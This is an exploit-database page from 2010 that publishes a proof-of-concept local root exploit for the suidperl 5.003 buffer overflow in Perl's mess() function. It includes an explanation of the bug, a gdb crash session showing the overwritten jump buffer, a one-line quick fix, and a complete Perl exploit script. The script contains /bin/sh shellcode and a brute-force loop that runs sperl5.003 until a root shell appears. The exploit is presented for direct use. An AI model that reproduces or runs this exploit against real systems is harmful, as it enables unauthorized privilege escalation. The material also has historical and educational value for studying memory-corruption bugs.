Linux perl-5.003-8/-9 Local Buffer Overflow PoC
Posted on 26 June 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Linux perl-5.003-8/-9 Local Buffer Overflow PoC</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>=============================================== Linux perl-5.003-8/-9 Local Buffer Overflow PoC =============================================== ######################################################################## #!/usr/bin/perl # Author: Thehacker # Site: [ [ :GODHACK.ORG : ] ] # Software Link: http://www.perl.com/download.csp # Version: perl-5.003-9 # Tested on: Red Hat Linux 4.2 on Intel (with perl-5.003-8 and -9) # CVE : # Code : ######################################################################## Any user can gain root privileges on a Intel Linux system with suidperl 5.003 (having the suid bit, of course) even if "SUIDBUF" and "two suidperl security patches" have been applied. Non-Intel / non-Linux platforms may be affected as well. It is still possible to overwrite a buffer a get root on Linux via sperl 5.003. ######################################################################## I have tested this on two Red Hat 4.2 systems running on Intel (with perl-5.003-8 and -9). I am pretty sure any Intel-like Linux having sperl5.003 is affected. Other platforms may be affected too. Perl 5.004 is NOT VULNERABLE. ######################################################################## Quick fix: chmod u-s /usr/bin/sperl5.003 (what else?) ######################################################################## Details: There is a nasty bug in mess() (util.c): it is possible to overflow its buffer (via sprintf()); mess() tries to detect this situation but fails to handle the problem properly: [excerpt from util.c] if (s - s_start >= sizeof(buf)) { /* Ooops! */ if (usermess) fputs(SvPVX(tmpstr), stderr); else fputs(buf, stderr); fputs("panic: message overflow - memory corrupted! ",stderr); my_exit(1); } It does not abort immediately. It prints out an error message and calls my_exit(1), and this is very bad. $ perl -v This is perl, version 5.003 with EMBED Locally applied patches: SUIDBUF - Buffer overflow fixes for suidperl security built under linux at Apr 22 1997 10:04:46 + two suidperl security patches $ perl `perl -e "print 'A' x 3000"` Can't open perl script "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA... ...AAAAAAAAAAAAAAAAA": File name too long panic: message overflow - memory corrupted! $ Can't open perl script "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA... ...AAAAAAAAAAAAAAAAA": File name too long panic: message overflow - memory corrupted! Segmentation fault (core dumped) $ gdb /usr/bin/perl core GDB is free software and you are welcome to distribute copies of it under certain conditions; type "show copying" to see the conditions. There is absolutely no warranty for GDB; type "show warranty" for details. GDB 4.16 (i586-unknown-linux), Copyright 1996 Free Software Foundation, Inc... (no debugging symbols found)... Core was generated by `perl AAAAA...'. Program terminated with signal 11, Segmentation fault. Reading symbols ... ... #0 0x41414141 in ?? () (gdb) Voila! 0x41414141 == "AAAA" The variable called top_env has been overwritten. In fact, it is jmp_buf and Perl calls longjmp() with it somewhere in my_exit(). ########################################################################## Run this and wait for a root prompt: [exploit code] #!/usr/bin/perl # yes, this suidperl exploit is in perl, isn't it wonderful? $| = 1; $shellcode = "x90" x 512 . # nops "xbcxf0xffxffxbf" . # movl $0xbffffff0,%esp # "standard shellcode" by Aleph One "xebx1fx5ex89x76x08x31xc0x88x46x07x89x46x0cxb0x0b" . "x89xf3x8dx4ex08x8dx56x0cxcdx80x31xdbx89xd8x40xcd" . "x80xe8xdcxffxffxff/bin/sh"; # start and end of .data # adjust this using /proc/*/maps $databot = 0x080a2000; $datatop = 0x080ab000; # trial and error loop $address = $databot + 4; while ($address < $datatop) { $smash_me = $shellcode . ('A' x (2052 - length($shellcode))) . (pack("l", $address) x 1000) . ('B' x 1000); $pid = fork(); if (!$pid) { exec('/usr/bin/sperl5.003', $smash_me); } else { wait; if ($? == 0) { printf("THE MAGIC ADDRESS WAS %08x ", $address); exit; } } $address += 128; } [end of exploit code] ######################################################################## -- Thehacker & Bl4ck Hat Team -- Gretz : TR-shark | KOmandO | SoyletmeZ | HEXB00T3R & iSKORPiTX -- Tnx all! //r0073r,str0k3,inj3ct0r,exploit-db,GODHACK We Will Never Stop Hacking Its not a game It's Our Job -----(-GODHACK.ORG-)------ # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-06-26]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
